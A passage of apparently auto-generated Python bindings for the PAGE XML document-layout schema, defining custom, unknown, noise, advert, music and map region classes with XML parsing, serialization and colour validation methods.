            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # RolesType declares no XML attributes, so nothing to parse.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Dispatch one parsed child element: only TableCellRole is expected."""
        if nodeName_ == 'TableCellRole':
            obj_ = TableCellRoleType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TableCellRole = obj_
            obj_.original_tagname_ = 'TableCellRole'
# end class RolesType
class CustomRegionType(RegionType):
    """Regions containing content that is not covered by the default types
    (text, graphic, image, line drawing, chart, table, separator, maths,
    map, music, chem, advert, noise, unknown).

    Adds one XML attribute over RegionType:
      type -- information on the type of content represented by this region
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('type_', 'string', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, type_=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("CustomRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Create an instance, honoring any registered subclass override.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, CustomRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if CustomRegionType.subclass:
            return CustomRegionType.subclass(*args_, **kwargs_)
        else:
            return CustomRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def hasContent_(self):
        # Content is determined entirely by the inherited RegionType members.
        if (
            super(CustomRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CustomRegionType', pretty_print=True):
        """Serialize this region (attributes plus inherited children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('CustomRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'CustomRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='CustomRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='CustomRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='CustomRegionType'):
        """Write inherited RegionType attributes, then the local type attribute."""
        super(CustomRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='CustomRegionType')
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CustomRegionType', fromsubclass_=False, pretty_print=True):
        # All children are handled by the RegionType base class.
        super(CustomRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the local type attribute, then defer to RegionType."""
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
        super(CustomRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # All children are handled by the RegionType base class.
        super(CustomRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class CustomRegionType
class UnknownRegionType(RegionType):
    """To be used if the region type cannot be ascertained.

    Adds no members of its own; everything is inherited from RegionType.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("UnknownRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
    def factory(*args_, **kwargs_):
        # Create an instance, honoring any registered subclass override.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, UnknownRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if UnknownRegionType.subclass:
            return UnknownRegionType.subclass(*args_, **kwargs_)
        else:
            return UnknownRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def hasContent_(self):
        # Content is determined entirely by the inherited RegionType members.
        if (
            super(UnknownRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnknownRegionType', pretty_print=True):
        """Serialize this region (attributes plus inherited children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('UnknownRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'UnknownRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnknownRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UnknownRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UnknownRegionType'):
        # All attributes are handled by the RegionType base class.
        super(UnknownRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnknownRegionType')
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnknownRegionType', fromsubclass_=False, pretty_print=True):
        # All children are handled by the RegionType base class.
        super(UnknownRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # All attributes are handled by the RegionType base class.
        super(UnknownRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # All children are handled by the RegionType base class.
        super(UnknownRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class UnknownRegionType
class NoiseRegionType(RegionType):
    """Noise regions are regions where no real data lies, only
    false data created by artifacts on the document or
    scanner noise.

    Adds no members of its own; everything is inherited from RegionType.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("NoiseRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
    def factory(*args_, **kwargs_):
        # Create an instance, honoring any registered subclass override.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, NoiseRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if NoiseRegionType.subclass:
            return NoiseRegionType.subclass(*args_, **kwargs_)
        else:
            return NoiseRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def hasContent_(self):
        # Content is determined entirely by the inherited RegionType members.
        if (
            super(NoiseRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NoiseRegionType', pretty_print=True):
        """Serialize this region (attributes plus inherited children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('NoiseRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'NoiseRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NoiseRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='NoiseRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='NoiseRegionType'):
        # All attributes are handled by the RegionType base class.
        super(NoiseRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NoiseRegionType')
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NoiseRegionType', fromsubclass_=False, pretty_print=True):
        # All children are handled by the RegionType base class.
        super(NoiseRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # All attributes are handled by the RegionType base class.
        super(NoiseRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # All children are handled by the RegionType base class.
        super(NoiseRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class NoiseRegionType
class AdvertRegionType(RegionType):
    """Regions containing advertisements.

    XML attributes (both optional):
        orientation -- the angle (degrees) the rectangle encapsulating the
            region has to be rotated clockwise to correct the present skew
            (negative values indicate anti-clockwise rotation).
            Range: -179.999,180
        bgColour -- the background colour of the region
            (pc:ColourSimpleType enumeration).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("AdvertRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, AdvertRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if AdvertRegionType.subclass:
            return AdvertRegionType.subclass(*args_, **kwargs_)
        else:
            return AdvertRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def validate_ColourSimpleType(self, value):
        """Validate type pc:ColourSimpleType, a restriction on string.

        Returns True when *value* is valid (or validation is disabled /
        value is None), False otherwise.  Failures are also reported
        through ``self.gds_collector_``.
        """
        # Fixed: ``result`` was previously assigned without initialization
        # and never returned, so the method silently returned None on the
        # enum-mismatch and success paths.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when there is child content to serialize."""
        if (
            super(AdvertRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AdvertRegionType', pretty_print=True):
        """Serialize this region as XML to *outfile* at the given indent level."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('AdvertRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'AdvertRegionType':
            # Preserve the tag name the element had in the source document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='AdvertRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='AdvertRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='AdvertRegionType'):
        """Write inherited attributes, then this type's own optional attributes."""
        super(AdvertRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='AdvertRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AdvertRegionType', fromsubclass_=False, pretty_print=True):
        """Write child elements; all children come from RegionType."""
        super(AdvertRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this type's own attributes, then delegate to RegionType."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour)    # validate type ColourSimpleType
        super(AdvertRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse a child element; AdvertRegionType declares no children of its own."""
        super(AdvertRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class AdvertRegionType
class MusicRegionType(RegionType):
    """Regions containing musical notations.

    XML attributes (both optional):
        orientation -- the angle (degrees) the rectangle encapsulating the
            region has to be rotated clockwise to correct the present skew
            (negative values indicate anti-clockwise rotation).
            Range: -179.999,180
        bgColour -- the background colour of the region
            (pc:ColourSimpleType enumeration).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("MusicRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, MusicRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if MusicRegionType.subclass:
            return MusicRegionType.subclass(*args_, **kwargs_)
        else:
            return MusicRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def validate_ColourSimpleType(self, value):
        """Validate type pc:ColourSimpleType, a restriction on string.

        Returns True when *value* is valid (or validation is disabled /
        value is None), False otherwise.  Failures are also reported
        through ``self.gds_collector_``.
        """
        # Fixed: ``result`` was previously assigned without initialization
        # and never returned, so the method silently returned None on the
        # enum-mismatch and success paths.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when there is child content to serialize."""
        if (
            super(MusicRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MusicRegionType', pretty_print=True):
        """Serialize this region as XML to *outfile* at the given indent level."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('MusicRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'MusicRegionType':
            # Preserve the tag name the element had in the source document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MusicRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MusicRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MusicRegionType'):
        """Write inherited attributes, then this type's own optional attributes."""
        super(MusicRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MusicRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MusicRegionType', fromsubclass_=False, pretty_print=True):
        """Write child elements; all children come from RegionType."""
        super(MusicRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this type's own attributes, then delegate to RegionType."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour)    # validate type ColourSimpleType
        super(MusicRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse a child element; MusicRegionType declares no children of its own."""
        super(MusicRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class MusicRegionType
class MapRegionType(RegionType):
    """Regions containing maps.

    XML attribute (optional):
        orientation -- the angle (degrees) the rectangle encapsulating the
            region has to be rotated clockwise to correct the present skew
            (negative values indicate anti-clockwise rotation).
            Range: -179.999,180
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema-driven member specification used by the generateDS machinery.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, gds_collector_=None, **kwargs_):
